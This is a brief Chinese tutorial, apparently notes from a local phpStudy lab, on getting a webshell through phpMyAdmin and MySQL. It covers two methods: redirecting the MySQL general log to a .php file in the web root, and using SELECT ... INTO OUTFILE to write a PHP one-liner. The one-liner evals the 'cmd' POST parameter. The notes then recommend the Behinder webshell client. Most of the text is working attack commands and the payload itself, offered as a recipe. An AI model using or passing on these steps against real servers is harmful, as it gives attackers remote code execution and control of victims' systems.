环境phpstudy
安装后直接访问即可密码为mysql的密码,在小皮中即可查看
通过日志文件拿Shell
利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。
把值修改为on,以及www下的php文件
然后去select语句
select "<?php phpinfo();eval($_POST['cmd']);?>"
导入导出拿WebShell
1.首先判断mysql位置
select @@datadir
2.猜测web路径猜测web路径扩展的同级目录下存在www目录
C:\phpstudy_pro\WWW\222.php
3.写入webshell
select "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"
对webshell使用冰蝎吧!